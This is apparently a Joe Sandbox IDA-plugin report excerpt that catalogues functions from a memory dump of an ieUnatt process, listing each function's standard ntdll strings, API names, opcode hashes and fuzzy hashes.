                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: bb8887424a2c6c15ba3c20935f1842c20be4e1997dd2ca2f5db59e7e7d728be9
                                                                                  • Instruction ID: ba99c74ab9b973b227808dd92fe92d237a0ab637fb546c2328826184753f9df1
                                                                                  • Opcode Fuzzy Hash: bb8887424a2c6c15ba3c20935f1842c20be4e1997dd2ca2f5db59e7e7d728be9
                                                                                  • Instruction Fuzzy Hash: 105103B5B40745AFDB20EE9CC89087FF7F8AF44204B50989DE896D3641E6B4FA008B60
                                                                                  Function 04307630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • Execute=1, xrefs: 04344713
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 04344787
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04344655
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 043446FC
                                                                                  • ExecuteOptions, xrefs: 043446A0
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04344742
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04344725
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  • Opcode ID: d43ee76a7afb2b68a163b44e9dc648e97b608df91d76c2788328ec4ef0f6fe8e
                                                                                  • Instruction ID: d350f068fb2b0a68b6c24177c4211c665c4d0eb3cb7c233cfe186d780e230184
                                                                                  • Opcode Fuzzy Hash: d43ee76a7afb2b68a163b44e9dc648e97b608df91d76c2788328ec4ef0f6fe8e
                                                                                  • Instruction Fuzzy Hash: B951077170021D6BFB10AAA4DCA5FFA77A8EF08744F1452A9E506A71D0EB70BA418F91
                                                                                  Function 043A6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                  • Instruction ID: 56bad586e3b9be6ed1a2ade722ab09b7d303a8547cba613bba489f2421fbcaab
                                                                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                  • Instruction Fuzzy Hash: 3E021571548341AFD308CF28C591E6FBBE9EFC8714F04A92DB9898B264DB31E915CB42
                                                                                  Function 0431B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-$0$0
                                                                                  • API String ID: 1302938615-699404926
                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction ID: 4773f6ca566b31ba137570a9d4866d90504b5608256198f6fa7f4269043d9675
                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction Fuzzy Hash: 1581D070E052498FEF2C8E68C8917FEFBB1AF55760F186119E861A72B0C734B840CB60
                                                                                  Function 043820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$[$]:%u
                                                                                  • API String ID: 48624451-2819853543
                                                                                  • Opcode ID: feabc0b40e2c94767c14411e9acdfed5073f2bbda23eb355bc34f4348844888d
                                                                                  • Instruction ID: 50875975b1f97d457f64cc9b5154212daca46f7d42b76bea4abd2ae15e5876ed
                                                                                  • Opcode Fuzzy Hash: feabc0b40e2c94767c14411e9acdfed5073f2bbda23eb355bc34f4348844888d
                                                                                  • Instruction Fuzzy Hash: C0215176A00219ABDB14EEB9DC40AEFBBF8EF54744F54115AE915E3200E730B9158BA1
                                                                                  Function 042FF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 043402BD
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 043402E7
                                                                                  • RTL: Re-Waiting, xrefs: 0434031E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  • Opcode ID: 296d471aa7f7ad0f86e64be08c0a30116b3c0884fd6d1147889030320ac24c20
                                                                                  • Instruction ID: 9579cf730aa6fd58cc74acbb99bf4304cc9fb674f7ed18ef4c39073d2c02f0cc
                                                                                  • Opcode Fuzzy Hash: 296d471aa7f7ad0f86e64be08c0a30116b3c0884fd6d1147889030320ac24c20
                                                                                  • Instruction Fuzzy Hash: B1E1AE307247419FD724CF28C984B6AF7E0AF88714F550A6AF6A58B6E0E774F844CB42
                                                                                  Function 0430BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04347B7F
                                                                                  • RTL: Re-Waiting, xrefs: 04347BAC
                                                                                  • RTL: Resource at %p, xrefs: 04347B8E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 0-871070163
                                                                                  • Opcode ID: c550dba10fd4f8018074d0b2ff927674af5c5096c295616f6ac76433bcb4d9ea
                                                                                  • Instruction ID: 7905f8ce18a29ea017769e53f3a307449cfcb287e3ee9339194deba8e6edb3e7
                                                                                  • Opcode Fuzzy Hash: c550dba10fd4f8018074d0b2ff927674af5c5096c295616f6ac76433bcb4d9ea
                                                                                  • Instruction Fuzzy Hash: E641E0353007029FD724DE29D850B6AB7E9EF89724F005A1DF99AAB690DB30F805CB91
                                                                                  Function 0430B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0434728C
                                                                                  Strings
                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04347294
                                                                                  • RTL: Re-Waiting, xrefs: 043472C1
                                                                                  • RTL: Resource at %p, xrefs: 043472A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 885266447-605551621
                                                                                  • Opcode ID: 34093e533ddc2897ee23038cb1b37b2e31d1085ebeb4187991ff8b9b7929e1ff
                                                                                  • Instruction ID: 023a1b1b378441138356c4146a370406a25bf91e5a9654395ee48f5efece7763
                                                                                  • Opcode Fuzzy Hash: 34093e533ddc2897ee23038cb1b37b2e31d1085ebeb4187991ff8b9b7929e1ff
                                                                                  • Instruction Fuzzy Hash: 2D410035700602AFD720DE65CC41FAAB7E9FF84714F206619FD95AB680DB21F8428BD1
                                                                                  Function 04382300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$]:%u
                                                                                  • API String ID: 48624451-3050659472
                                                                                  • Opcode ID: 5ec723ad53aa336cfae795a1fcf0fc5773ec51597eda4d48a1c575392294261a
                                                                                  • Instruction ID: bba6c4f1bd827e6711bbb61df2681ddaec5da3fa6ae83ced0d97abef90d276df
                                                                                  • Opcode Fuzzy Hash: 5ec723ad53aa336cfae795a1fcf0fc5773ec51597eda4d48a1c575392294261a
                                                                                  • Instruction Fuzzy Hash: 6E318676A002199FDB24DE29CC50BEFB7F8EF44710F945599E849E3200EB70BA448FA1
                                                                                  Function 04317D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-
                                                                                  • API String ID: 1302938615-2137968064
                                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction ID: 780f753c33cc798481d9be3746f5c8ee9378d69309745630bc9e1664b5af3c3c
                                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction Fuzzy Hash: 52919371E0021A9BDF2CDE69C881ABFB7E5AF44760F18651AE855E72E0E730B9418760
                                                                                  Function 042D9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@
                                                                                  • API String ID: 0-1194432280
                                                                                  • Opcode ID: 3910606eca533fc754efbfac6732b30cd97576c24d74a308cc1e8a527a151510
                                                                                  • Instruction ID: f41de42d29fe03958b628f88aabc407db69d614dd6f85b744066dc301fbb9da1
                                                                                  • Opcode Fuzzy Hash: 3910606eca533fc754efbfac6732b30cd97576c24d74a308cc1e8a527a151510
                                                                                  • Instruction Fuzzy Hash: BE81FDB1E102699BDB35CF54CC45BEEB7B8AF48754F0041DAA919B7240D770AE84CF64